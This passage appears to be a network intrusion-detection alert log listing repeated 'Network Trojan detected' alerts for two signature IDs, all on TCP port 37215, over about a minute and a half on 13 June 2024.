              SID:2829579
              Source Port:52346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568143
              SID:2835222
              Source Port:44870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268283
              SID:2835222
              Source Port:35044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608639
              SID:2835222
              Source Port:53456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943286
              SID:2835222
              Source Port:52936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177336
              SID:2835222
              Source Port:56514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503880
              SID:2829579
              Source Port:54428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308617
              SID:2835222
              Source Port:59222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786996
              SID:2835222
              Source Port:58364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219728
              SID:2829579
              Source Port:57172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.799806
              SID:2835222
              Source Port:58108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658232
              SID:2829579
              Source Port:46122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823698
              SID:2835222
              Source Port:50018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028521
              SID:2835222
              Source Port:33252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194483
              SID:2829579
              Source Port:43798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546254
              SID:2829579
              Source Port:40656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238141
              SID:2835222
              Source Port:46370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636091
              SID:2829579
              Source Port:39682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453787
              SID:2829579
              Source Port:36416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696398
              SID:2835222
              Source Port:51072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993068
              SID:2829579
              Source Port:33286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801015
              SID:2829579
              Source Port:45912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568572
              SID:2835222
              Source Port:38490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457107
              SID:2829579
              Source Port:52198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526099
              SID:2829579
              Source Port:45990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708386
              SID:2835222
              Source Port:59430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991574
              SID:2829579
              Source Port:39026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424341
              SID:2829579
              Source Port:59668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567591
              SID:2829579
              Source Port:41044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781863
              SID:2829579
              Source Port:43904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278363
              SID:2829579
              Source Port:55780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221123
              SID:2829579
              Source Port:36726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757221
              SID:2829579
              Source Port:35360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014367
              SID:2829579
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868175
              SID:2835222
              Source Port:46826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216364
              SID:2829579
              Source Port:47076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373769
              SID:2829579
              Source Port:46074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677044
              SID:2829579
              Source Port:48766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416784
              SID:2835222
              Source Port:35426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153259
              SID:2829579
              Source Port:42108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273876
              SID:2829579
              Source Port:52478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155721
              SID:2829579
              Source Port:37272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417334
              SID:2835222
              Source Port:50470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844006
              SID:2835222
              Source Port:44714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403598
              SID:2829579
              Source Port:50252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.089979
              SID:2835222
              Source Port:39676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370960
              SID:2835222
              Source Port:56900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043908
              SID:2829579
              Source Port:51922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265163
              SID:2829579
              Source Port:44098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842681
              SID:2835222
              Source Port:47808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941572
              SID:2835222
              Source Port:60388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254681
              SID:2835222
              Source Port:58228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611414
              SID:2835222
              Source Port:48586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503906
              SID:2835222
              Source Port:59780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211751
              SID:2835222
              Source Port:43724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309086
              SID:2835222
              Source Port:47634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612551
              SID:2835222
              Source Port:41500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212470
              SID:2829579
              Source Port:49272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401789
              SID:2829579
              Source Port:49070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820067
              SID:2829579
              Source Port:57706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543901
              SID:2829579
              Source Port:41298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112602
              SID:2835222
              Source Port:37070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696463
              SID:2835222
              Source Port:52928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223098
              SID:2829579
              Source Port:54292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787667
              SID:2829579
              Source Port:51930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415327
              SID:2829579
              Source Port:35522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043762
              SID:2829579
              Source Port:49308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437428
              SID:2835222
              Source Port:47704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306101
              SID:2829579
              Source Port:32804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279635
              SID:2835222
              Source Port:37928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160048
              SID:2835222
              Source Port:47844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707992
              SID:2829579
              Source Port:57944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345723
              SID:2835222
              Source Port:59422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507656
              SID:2835222
              Source Port:50898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123734
              SID:2835222
              Source Port:52034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132921
              SID:2829579
              Source Port:36992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758392
              SID:2835222
              Source Port:34932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027233
              SID:2829579
              Source Port:56590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823444
              SID:2835222
              Source Port:42210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.161120
              SID:2829579
              Source Port:57490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805739
              SID:2835222
              Source Port:45644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303062
              SID:2835222
              Source Port:36686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440831
              SID:2829579
              Source Port:39398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993009
              SID:2829579
              Source Port:34906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129956
              SID:2829579
              Source Port:44244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353700
              SID:2835222
              Source Port:55268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914394
              SID:2835222
              Source Port:38064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678214
              SID:2835222
              Source Port:42270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.930321
              SID:2835222
              Source Port:43308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614703
              SID:2829579
              Source Port:41700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.453468
              SID:2835222
              Source Port:44738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304236
              SID:2829579
              Source Port:34440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308913
              SID:2829579
              Source Port:42080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153760
              SID:2835222
              Source Port:50772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276503
              SID:2829579
              Source Port:48030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886714
              SID:2829579
              Source Port:49858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133506
              SID:2829579
              Source Port:38554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077923
              SID:2829579
              Source Port:56480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344723
              SID:2835222
              Source Port:51132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408826
              SID:2829579
              Source Port:34668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823627
              SID:2829579
              Source Port:35404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012104
              SID:2829579
              Source Port:49978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176943
              SID:2829579
              Source Port:43494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800504
              SID:2829579
              Source Port:59190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754902
              SID:2829579
              Source Port:54746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339438
              SID:2835222
              Source Port:57288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322671
              SID:2829579
              Source Port:60272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780064
              SID:2829579
              Source Port:54400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791341
              SID:2829579
              Source Port:33832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195573
              SID:2835222
              Source Port:45402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345365
              SID:2835222
              Source Port:36080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660605
              SID:2829579
              Source Port:42040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248309
              SID:2829579
              Source Port:59504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107025
              SID:2829579
              Source Port:40786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731572
              SID:2835222
              Source Port:55064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078656
              SID:2835222
              Source Port:45556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012259
              SID:2835222
              Source Port:46950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675626
              SID:2835222
              Source Port:39108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358139
              SID:2829579
              Source Port:48668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544018
              SID:2829579
              Source Port:41778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832462
              SID:2835222
              Source Port:53208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994014
              SID:2835222
              Source Port:48624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912424
              SID:2835222
              Source Port:35580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174612
              SID:2829579
              Source Port:38312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.296425
              SID:2829579
              Source Port:55832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638233
              SID:2829579
              Source Port:51058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507487
              SID:2835222
              Source Port:44846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611256
              SID:2829579
              Source Port:37516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177385
              SID:2829579
              Source Port:56388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196425
              SID:2835222
              Source Port:60660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131350
              SID:2835222
              Source Port:56688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670664
              SID:2835222
              Source Port:41560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937931
              SID:2829579
              Source Port:43006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128063
              SID:2829579
              Source Port:33744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654550
              SID:2835222
              Source Port:43500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839225
              SID:2835222
              Source Port:34196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834173
              SID:2835222
              Source Port:33030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758132
              SID:2835222
              Source Port:35218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196534
              SID:2829579
              Source Port:54794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.153997
              SID:2829579
              Source Port:59242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941078
              SID:2829579
              Source Port:41094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943373
              SID:2835222
              Source Port:48000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016138
              SID:2829579
              Source Port:41600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176679
              SID:2835222
              Source Port:58746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887820
              SID:2829579
              Source Port:44156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157349
              SID:2829579
              Source Port:59636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078446
              SID:2829579
              Source Port:52566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309005
              SID:2835222
              Source Port:45544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219503
              SID:2829579
              Source Port:40070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801115
              SID:2835222
              Source Port:33086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230515
              SID:2835222
              Source Port:42114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131294
              SID:2829579
              Source Port:46288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277587
              SID:2829579
              Source Port:33976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.380426
              SID:2829579
              Source Port:54468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752788
              SID:2829579
              Source Port:39762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612092
              SID:2829579
              Source Port:38098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869360
              SID:2829579
              Source Port:35286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488607
              SID:2829579
              Source Port:39110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307799
              SID:2829579
              Source Port:33352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675802
              SID:2835222
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753380
              SID:2829579
              Source Port:35214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027769
              SID:2829579
              Source Port:43158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477845
              SID:2835222
              Source Port:51580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910923
              SID:2835222
              Source Port:46806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888594
              SID:2829579
              Source Port:52378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785769
              SID:2835222
              Source Port:45360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198038
              SID:2829579
              Source Port:42780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093081
              SID:2835222
              Source Port:41142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403630
              SID:2835222
              Source Port:42256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553019
              SID:2835222
              Source Port:55514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048209
              SID:2835222
              Source Port:52166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439184
              SID:2835222
              Source Port:41332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567257
              SID:2835222
              Source Port:54178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028039
              SID:2829579
              Source Port:59564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885734
              SID:2835222
              Source Port:56040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993235
              SID:2829579
              Source Port:46502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823847
              SID:2829579
              Source Port:47436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310285
              SID:2835222
              Source Port:43470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800013
              SID:2835222
              Source Port:52898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221680
              SID:2829579
              Source Port:57280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101755
              SID:2835222
              Source Port:49504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123630
              SID:2829579
              Source Port:51450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480890
              SID:2829579
              Source Port:55786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227358
              SID:2829579
              Source Port:53824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991001
              SID:2829579
              Source Port:55306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785606
              SID:2835222
              Source Port:55164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805117
              SID:2829579
              Source Port:47680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478222
              SID:2835222
              Source Port:39670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026455
              SID:2835222
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294458
              SID:2829579
              Source Port:47970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192057
              SID:2829579
              Source Port:43920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977755
              SID:2835222
              Source Port:42700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267622
              SID:2829579
              Source Port:48616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509868
              SID:2829579
              Source Port:57448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696691
              SID:2835222
              Source Port:52950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804575
              SID:2829579
              Source Port:45744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660566
              SID:2835222
              Source Port:50386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404035
              SID:2829579
              Source Port:54168
              Destination Port:37215
